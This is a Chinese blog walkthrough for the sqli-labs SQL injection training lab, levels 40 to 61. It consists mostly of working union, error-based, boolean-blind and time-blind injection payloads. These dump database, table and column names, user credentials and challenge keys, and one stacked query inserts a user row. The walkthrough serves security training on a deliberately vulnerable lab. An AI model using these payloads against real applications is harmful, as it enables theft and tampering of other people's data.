sqli-labs靶场通关攻略——(41-60)

已于 2024-09-02 16:45:31 修改
阅读量697 收藏 11
点赞数 19
文章标签: 数据库 sql mysql
于 2024-08-28 19:14:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A2893992091/article/details/141645356
版权

目录

目录

目录

第四十关

第四十一关

第四十二关

第四十三关

第四十四关

第四十五关

第四十六关

第四十七关

第四十八关 

第四十九关

第五十关

第五十一关

第五十二关

第五十三关

第五十四关

第五十五关

第五十六关

第五十七关

 第五十八关

第五十九关

第六十关

第四十关

判断闭合方式

闭合方式为‘)--+

2.联合注入,爆库

?id=-1') union select 1,database(),user() --+

3.联合注入,爆表

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

 4.联合注入,爆列

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

 5.联合注入,爆数据

?id=-1') union select 1,group_concat(id,username,password),3 from users --+

第四十一关

1.判断闭合方式

 闭合方式为整数型

2.联合注入,爆库

?id=-1 union select 1,database(),3--+

3.联合注入,爆表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

 4.联合注入,爆列

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

第四十二关

 判断闭合方式为’

报错注入查库名

login_user=1&login_password=1000'or updatexml(1,concat(1,database()),3)--+&mysubmit=Login

 报错注入查表名

login_user=1&login_password=1000'or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3)--+&mysubmit=Login

抓包,使用堆叠注入输入新的用户名(没啥用)

login_user=1&login_password=1';insert into users(id,username,password) values ('30','www','wawa')--+&mysubmit=Login

注入成功

第四十三关

  判断闭合方式为’)--+

报错注入,爆库

 login_user=a&login_password=1000') and updatexml(1,concat(1,database()),3)--+&mysubmit=Login

 报错注入,爆表

login_user=a&login_password=1000') and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),3)--+&mysubmit=Login

第四十四关

抓包,查库和上一关流程差不多,只是此关采用布尔盲注

login_user=1&login_password=1000' or (ascii(substr(database() ,1,1)))=115--+&mysubmit=Login

查得第一个字符为s,其余字符分别为ecurity

 布尔盲注,查第四张表

login_user=1&login_password=1000' or  ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))>100--+&mysubmit=Login

第四十五关

闭合方式为’),具体操作流程和四十四关一样。 

login_user=1&login_password=1000') or (ascii(substr(database() ,1,1)))=115--+&mysubmit=Login

第四十六关

使用新的参数sort,通过输入1,2,3表中出现不同数据,该sql语句是order by

sql语句参数没有引号且不能使用联合注入,有报错显示,所以我们可以使用updatexml进行报错

查库

?sort=1 and updatexml(1,concat(1,database()),1)--+

查表

?sort=1 and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1)--+

查列

?sort=1 and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users')),1)--+

第四十七关

该关闭合方式为'--+闭合

报错注入查库

?sort=1' and updatexml(1,concat(1,database()),3)--+

报错注入查表

?sort=1' and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),3)--+

 报错注入查列

?sort=1' and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users')),3)--+

第四十八关 

该关闭合方法和47关一样,只是没有报错,需要使用时间盲注

时间盲注查库

 ?sort=1 and if((ascii(substr(database(),1,1))=100),sleep(3),0) --+

查得第一个字母的ascii的值为115,字母s,其他几位分别是ecurity

 时间盲注查第四张表

?sort=1 and if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='security'limit 3,1),1,1))=117),sleep(3),0) --+

 第一位为u,剩余几位为sers

第四十九关

第四十九关也是时间盲注,闭合方式为’--+

时间盲注查库

?sort=1' and if((ascii(substr(database(),1,1))=100),sleep(3),0) --+

查得第一个字母的ascii的值为115,字母s,其他几位分别是ecurity

时间盲注查第四张表

?sort=1' and if((ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='security'limit 3,1),1,1))=117),sleep(3),0) --+

 第一位为u,剩余几位为sers 

第五十关

该关闭合方式为--+,可以使用报错注入

 报错注入查库

?sort=1 and updatexml(1,concat(1,database()),3) --+

爆错注入查表

?sort=1 and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),3) --+

第五十一关

闭合方式为'--+

查库

?sort=1 ' and updatexml(1,concat(1,database()),1) --+

查表

 ?sort=1 ' and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1) --+

 查列

 ?sort=1 ' and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users')),1) --+

 查数据

?sort=1 ' and updatexml(1,concat(1,(select group_concat(id,username,password)from users)),1) --+

第五十二关

参数为整形,没有报错显示,此处使用堆叠注入或时间盲注

时间盲注查库

库名第一位 

?sort=1 and if((ascii(substr(database(),1,1))=115),sleep(1),0) --+

 第二位

?sort=1 and if((ascii(substr(database(),2,1))=101),sleep(1),0) --+ 

 其余几位都是curity

查询第四张表

?sort=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(3),0) --+

 第一位ascii码是117,字母u,剩下几位字母分别是sers

第五十三关

该参数是字符型,单引号闭合,没有报错显示,可以使用堆叠注入或者时间盲注

时间盲注,查库

第一位

?sort=1‘ and if((ascii(substr(database(),1,1))=115),sleep(1),0) --+

第二位

?sort=1' and if((ascii(substr(database(),2,1))=101),sleep(1),0)--+

 第一位是s,第二位是e, 其余几位都是curity

查询第四张表

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(3),0) --+

  第一位ascii码是117,字母u,剩下几位字母分别是sers

第五十四关

五十四关翻译页面的英文,得知只有十次输入机会,超过十次所有表名,列名,等等都会随机重置。id参数是单引号闭合就行

联合注入查库名

?id=-1' union select 1,database(),3--+

联合注入查表名

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+

 联合注入查列名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='5iayl7jks0'--+

 列名为id,sessid,secret_MLYE,tryy

key藏在secret_MLYE中

 联合注入查数据,获取k的值

?id=-1' union select 1,group_concat(secret_MLYE),3 from 5iayl7jks0--+

输入key的值

 完成

第五十五关

五十五关是有14次机会,id参数是加了括号的整数

 联合注入查库名

?id=-1) union select 1,database(),3--+

库名为challenges 

联合注入查表

?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+

 表名为:w05egeiufr

 联合注入查列

?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='w05egeiufr'--+

 列名为id,sessid,secret_XCRT,tryy

key藏在 secret_XCRT

联合注入查secret_XCRT列的数据

 ?id=-1) union select 1,group_concat(secret_XCRT),3 from w05egeiufr--+

 查到key输入输入框中

第五十六关

闭合方式为‘)--+和五十五关一样

联合注入查库

?id=-1') union select 1,database(),3 --+

联合注入查表

-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+

联合注入查列

 -1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='hj8sst1lnf'--+

 联合注入查key

-1') union select 1,group_concat(secret_I1GW),3 from hj8sst1lnf--+

 

第五十七关

十四机会,闭合方式为双引号闭合

联合注入查库

?id=-1" union select 1,database(),3 --+

 联合注入查表

?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'--+

联合注入查列

?id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='smdhz1ans1'--+

联合注入查列

 ?id=-1" union select 1,group_concat(secret_QJLI),3 from smdhz1ans1--+

 

 第五十八关

五十八关和前面几关不一样,因为该关卡的数据不是直接数据库里面取得,而是在一个数组里面取出得。所以联合注入是不行得。但是有报错显示,所以可以使用报错注入。

报错注入查库

?id=1' and updatexml(1,concat(1,database()),1)--+

报错注入查表

?id=1' and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='challenges')),1)--+

 报错注入查列

?id=1' and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='challenges' and table_name='taflmq8lit')),1)--+

报错注入查数据

 ?id=1' and updatexml(1,concat(1,(select group_concat(secret_ZWC8)from taflmq8lit)),1)--+

 

第五十九关

五十九关和五十八关一样使用报错注入,id是整数型。

报错注入查库

?id=1 and updatexml(1,concat(1,database()),1)--+

报错注入查表

?id=1 and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='challenges')),1)--+

 报错注入查列

?id=1 and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='challenges' and table_name='y2wdeniqzt')),1)--+

 报错注入查key

?id=1 and updatexml(1,concat(1,(select group_concat(secret_1KM4)from y2wdeniqzt)),1)--+

第六十关

六十关闭合方式是双引号加括号。

报错注入查库

?id=1") and updatexml(1,concat(1,database()),1)--+

 报错注入查表

1") and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='challenges')),1)--+

联合注入查列

1") and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema='challenges' and table_name='k2gyz5zpl3')),1)--+

联合注入查库

?id=1") and updatexml(1,concat(1,(select group_concat(secret_84J0)from k2gyz5zpl3)),1)--+

 

第六十一关

六十二关没有报错显示,可以使用布尔盲注和时间盲注。id参数是单引号加括号

布尔盲注查表名

?id=1') and ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='challenges' limit 0,1),1,1))=103--+

查得第一个ascii为103,字母g

 查得第二个ascii为110,字母n

 查得第三个ascii为99,字母c

 查得第四个ascii为100,字母d

查得第五个ascii为103,字母g

查得第六个ascii为101,字母e

无敌的俊哥
关注
sqlilabs靶场搭建
hibugs
03-09 1818
SQL注入是比较常见的一个高风险漏洞,所以学习SQL注入也是学习网络安全的一个关键。学习漏洞一定要从实践中学习,所以一个靶场就显得相当重要。本文将教会大家sqlilabs(一个SQL注入的靶场)的安装。ps:sqlilabs需要apache+MySQL环境的支持,所以需要安装apache和MySQL,当然这里推荐使用phpstudy,更加快捷的实现apache+MySQL的配置,对于学习漏洞可以省去很多的事情。如果还未安装相关环境的可以参考我的另一篇文章:phpstudy安装。
sqli-laba靶场搭建
不眠的博客
01-08 1776
phpstudy_pro\WWW\sqli\sqli-labs-master\sql-connections下的db-creds.inc文件进行编辑。最后提醒一下,在docker搭建靶场,在关闭docker容器或者虚拟机关机sqli数据库会丢失。点击创建数据库,重新访问192.168.121.129 (IP+8002)将下载好的靶场解压在phpstudy的www目录(根目录)下。将sqli-labs映射到本地的8002端口运行。搭建完成开始你的黑客学习旅程吧!将sqli-labs部署到本地。
Sqli-labs靶场搭建(适合新手小白围观)
记录开发和安全学习过程中的点点滴滴
09-12 8602
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sql-labs靶场环境搭建
ljlrookiebird的博客
03-29 2832
有可能mysql无法打开,应该是和你本地的mysql冲突了,找到命令提示符界面右键使用管理员打开后,输入命令:sc delete mysql,删除你本地的mysql,记住用管理员打开,否则可能没有权限导致无法删除,删除后即可在phpstudy面板正常启动mysql服务。最近突然想对网安知识进行复习,然后就想起之前做过的sql-labs靶场,这个靶场对于我们学习sql注入的知识还是比较有帮助的,接下来我就记录下我的闯关过程吧,本文章一共分为环境搭建和闯关两部分。初始化完成后就可以愉快的开始闯关了。
sqli-labs靶场搭建
joey_1123的博客
05-21 1299
4.打开D:\phpstudy_pro\WWW\sqli-labs\sql-connections中的db-creds.inc 修改如图。3.把这个解压到php根目录下 修改名字为sqli-labs。9.退回再点第一个SQLi-LABS Page…7.用浏览器访问127.0.0.1/sqli-labs。5.修改phpstudy中数据库的密码为123456。2.去github上下载sqli-labs。8.点击第二个选项Setup/reset…注:不能使用 php7.x 版本。sqli-labs靶场搭建
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1408
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1838
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1625
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 711
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1073
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
使用phpstudy搭建sqlilabs靶场
qq_51107315的博客
06-30 1235
接下来点击左侧网站进入网站管理界面,点击管理然后选择php版本点击更多版本,随便下载php5.x的版本。因为php的7.x版本太高,sqlilabs文件中的mysql_connect() 只能在php5.x的版本中使用。修改 D:\phpstudy_pro\WWW\sqlilabs\sql-connections下的数据连接文件 db-creds.inc。把解压后的文件夹的名字改成sqlilabs放在phpstudy安装目录下的 D:\phpstudy_pro中的WWW文件夹中。打开phpstudy软件。
SQLI-LABS靶场的安装
x15wda33的博客
06-15 331
phpstudy:一款集成了mysql,apache,ftp,nginx等多部分的软件套组可以用于快速搭建小型网站供学习,漏洞复现,靶场搭建等。步骤一:在本地磁盘的phpstudy/www目录下创建一个文件夹用于存放靶场解压文件,这里使用sqli-labs。步骤二:球盖sql-connect/db-creds.inc中的dbpass选项。本靶场搭建依托于phpstudy,该软件可以直接去官方下载。1.SQLI-LABS靶场搭建
sqli-labs-master靶场搭建
m0_49420271的博客
06-07 703
sqli-labs-master靶场简单搭建
如何搭建 SQLi-Labs 靶场保姆级教程(附链接)
Flag少侠的博客
02-04 5289
如何搭建 sqli-labs 靶场保姆级教程(附链接)
sqli-labs-master靶场搭建详细过程(附下载链接)
weixin_42090431的博客
07-02 657
3、把sqli压缩包放进去解压,找到$dbpass='' 单引号里面填root 具体路径如下。
Web安全 SQL注入靶场搭建(玩转整个注入环境.)
网络安全领域___专研者.
05-25 5816
SQLI-LABS靶场概括: SQL语言就是我们在管理数据库时用到的一种。在我们的应用系统使用sql语句进行管理应用数据库时,往往采用拼接的方式形成一条完整的数据库语言,而危险的是,在拼接sql语句的时候,我们可以改变sql语句。从而让数据执行我们想要执行的语句,这就是我们常说的sql注入。而Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程.
windows环境下搭建Sqli-Labs靶场
最新发布
m0_72210904的博客
04-27 908
SQLi-LABS 是一款SQL注入的靶场环境,共有75关,是网安入门、进阶必打的一款靶场;下面的测试场景都支持GET和POST两种注入方式:1.报错注入(联合查询)1)字符型2)数字型2.报错注入(基于二次注入)3.盲注1)基于布尔值2)基于时间4.UPDATE型注入练习5.INSERT型注入练6. HTTP头部注入1)基于Referer2)基于UserAgent3)基于Cookie7. 二次排序注入练习.....
[SQL靶场搭建]使用Docker搭建SQLi-LAB靶场
m0_61155226的博客
03-29 2403
SQL注入靶场搭建
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,访问sqli-labs的首页,通常是 http://localhost/sqli-labs/。 3. 在首页上,你会看到一系列的级别和挑战。从级别1开始,逐步挑战更高级别的注入漏洞。 4. 阅读每个级别的说明和提示,理解目标和漏洞类型。 5. 使用SQL注入的技巧来寻找漏洞并进行利用。一些常见的注入技巧包括:使用单引号、双引号绕过输入过滤、使用UNION SELECT语句、使用注释符绕过过滤、使用布尔盲注等。 6. 尝试不同的Payload(载荷)来获取敏感信息或执行恶意操作。例如,获取数据库的表名、列名、数据内容,或者尝试修改数据库中的数据。 7. 当你成功获取到关键信息或者完成了特定的目标,即可认为通关。 需要注意的是,在进行sqli-labs靶场挑战时,请确保你在合法的环境中进行,不要尝试攻击他人的系统或进行非法活动。同时,及时备份并恢复你的环境,以防误操作导致数据丢失。 希望这些步骤和提示对你有所帮助!如有更多问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值